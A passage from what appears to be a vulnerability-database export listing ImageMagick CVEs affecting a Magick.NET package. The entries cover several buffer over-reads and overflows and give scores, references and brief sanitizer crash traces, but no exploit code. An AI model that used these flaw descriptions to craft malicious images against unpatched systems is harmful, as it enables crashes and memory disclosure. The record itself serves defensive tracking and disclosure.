    #0 0x56260222912f  (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x235f12f)
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25795.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25795.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25795
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05285
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.05133
published_at 2026-04-18T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.0513
published_at 2026-04-16T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05185
published_at 2026-04-13T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.05199
published_at 2026-04-12T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.05248
published_at 2026-04-09T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05229
published_at 2026-04-08T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05197
published_at 2026-04-07T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05177
published_at 2026-04-04T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.05216
published_at 2026-04-11T12:55:00Z
10
value 0.00061
scoring_system epss
scoring_elements 0.19112
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25795
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25795
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25795
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50
7
reference_url https://github.com/ImageMagick/ImageMagick/commit/55c344f4b514213642da41194bab57b4476fb9f5
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/55c344f4b514213642da41194bab57b4476fb9f5
8
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p33r-fqw2-rqmm
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:07:57Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p33r-fqw2-rqmm
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25795
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25795
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442099
reference_id 2442099
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442099
11
reference_url https://github.com/advisories/GHSA-p33r-fqw2-rqmm
reference_id GHSA-p33r-fqw2-rqmm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p33r-fqw2-rqmm
12
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25795, GHSA-p33r-fqw2-rqmm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dtza-65ku-aber
26
url VCID-emmr-15qp-vfah
vulnerability_id VCID-emmr-15qp-vfah
summary 
ImageMagick has Global Buffer Overflow (OOB Read) via Negative Pixel Index in UIL and XPM Writer
The UIL and XPM image encoder do not validate the pixel index value returned by `GetPixelIndex()` before using it as an array subscript. In HDRI builds, `Quantum` is a floating-point type, so pixel index values can be negative. An attacker can craft an image with negative pixel index values to trigger a global buffer overflow read during conversion, leading to information disclosure or a process crash.

```
READ of size 1 at 0x55a8823a776e thread T0
    #0 0x55a880d01e85 in WriteUILImage coders/uil.c:355
```

```
READ of size 1 at 0x55fa1c04c66e thread T0
    #0 0x55fa1a9ee415 in WriteXPMImage coders/xpm.c:1135
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25898.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25898.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25898
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.057
published_at 2026-04-21T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05535
published_at 2026-04-18T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05526
published_at 2026-04-16T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05579
published_at 2026-04-13T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05586
published_at 2026-04-12T12:55:00Z
5
value 0.00021
scoring_system epss
scoring_elements 0.05596
published_at 2026-04-11T12:55:00Z
6
value 0.00021
scoring_system epss
scoring_elements 0.05624
published_at 2026-04-09T12:55:00Z
7
value 0.00021
scoring_system epss
scoring_elements 0.056
published_at 2026-04-08T12:55:00Z
8
value 0.00021
scoring_system epss
scoring_elements 0.05562
published_at 2026-04-07T12:55:00Z
9
value 0.00021
scoring_system epss
scoring_elements 0.05563
published_at 2026-04-04T12:55:00Z
10
value 0.00058
scoring_system epss
scoring_elements 0.18459
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25898
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25898
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25898
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/c9c87dbaba56bf82aebd3392e11f0ffd93709b12
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/c9c87dbaba56bf82aebd3392e11f0ffd93709b12
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vpxv-r9pg-7gpr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:26:22Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vpxv-r9pg-7gpr
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25898
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25898
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442102
reference_id 2442102
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442102
10
reference_url https://github.com/advisories/GHSA-vpxv-r9pg-7gpr
reference_id GHSA-vpxv-r9pg-7gpr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vpxv-r9pg-7gpr
11
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25898, GHSA-vpxv-r9pg-7gpr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-emmr-15qp-vfah
27
url VCID-f1zu-xb4j-8qhp
vulnerability_id VCID-f1zu-xb4j-8qhp
summary 
ImageMagick has a heap buffer over-read in its MAP image decoder
A heap buffer over-read vulnerability exists in the MAP image decoder when processing crafted MAP files, potentially leading to crashes or unintended memory disclosure during image decoding.

```
=================================================================
==4070926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000002b31 at pc 0x56517afbd910 bp 0x7ffc59e90000 sp 0x7ffc59e8fff0
READ of size 1 at 0x502000002b31 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25987.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25987.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25987
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03398
published_at 2026-04-21T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.03275
published_at 2026-04-18T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.03265
published_at 2026-04-16T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.03289
published_at 2026-04-13T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.0331
published_at 2026-04-12T12:55:00Z
5
value 0.00015
scoring_system epss
scoring_elements 0.03339
published_at 2026-04-11T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.0338
published_at 2026-04-09T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.03359
published_at 2026-04-08T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.03354
published_at 2026-04-07T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.03334
published_at 2026-04-02T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.03346
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25987
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25987
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25987
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:07:26Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25987
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25987
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442115
reference_id 2442115
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442115
10
reference_url https://github.com/advisories/GHSA-42p5-62qq-mmh7
reference_id GHSA-42p5-62qq-mmh7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-42p5-62qq-mmh7
11
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25987, GHSA-42p5-62qq-mmh7
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f1zu-xb4j-8qhp
28
url VCID-fnck-7mvx-hqc9
vulnerability_id VCID-fnck-7mvx-hqc9
summary 
ImageMagick has a heap Buffer Over-read  in its DJVU image format handler
A heap Buffer Over-read vulnerability exists in the DJVU image format handler. The vulnerability occurs due to integer truncation when calculating the stride (row size) for pixel buffer allocation. The stride calculation overflows a 32-bit signed integer, resulting in an out-of-bounds memory reads.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27799.json
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27799.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27799
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03365
published_at 2026-04-04T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.03416
published_at 2026-04-21T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.03299
published_at 2026-04-18T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.03288
published_at 2026-04-16T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.03312
published_at 2026-04-13T12:55:00Z
5
value 0.00015
scoring_system epss
scoring_elements 0.03335
published_at 2026-04-12T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.03363
published_at 2026-04-11T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.0338
published_at 2026-04-07T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.03353
published_at 2026-04-02T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.03406
published_at 2026-04-09T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.03385
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27799
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27799
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27799
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/e87695b3227978ad70b967b8d054baaf8ac2cced
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/
url https://github.com/ImageMagick/ImageMagick/commit/e87695b3227978ad70b967b8d054baaf8ac2cced
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r99p-5442-q2x2
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r99p-5442-q2x2
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27799
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27799
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442879
reference_id 2442879
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442879
10
reference_url https://github.com/advisories/GHSA-r99p-5442-q2x2
reference_id GHSA-r99p-5442-q2x2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r99p-5442-q2x2
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-27799, GHSA-r99p-5442-q2x2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fnck-7mvx-hqc9
29
url VCID-g41y-dv8u-3yf1
vulnerability_id VCID-g41y-dv8u-3yf1
summary 
ImageMagick has Heap Buffer Overflow in WaveletDenoiseImage
A crafted image could cause an out of bounds heap write inside the WaveletDenoiseImage method. When processing a crafted image with the -wavelet-denoise operation an out of bounds write can occur.

```
=================================================================
==661320==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x503000002754 at pc 0x5ff45f82c92a bp 0x7fffb732b400 sp 0x7fffb732b3f0
WRITE of size 4 at 0x503000002754 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30936.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30936.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30936
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04429
published_at 2026-04-09T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04412
published_at 2026-04-08T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04378
published_at 2026-04-07T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04368
published_at 2026-04-04T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04346
published_at 2026-04-02T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.052
published_at 2026-04-21T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.0513
published_at 2026-04-11T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05114
published_at 2026-04-12T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05099
published_at 2026-04-13T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.05047
published_at 2026-04-16T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.05052
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30936
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30936
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30936
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
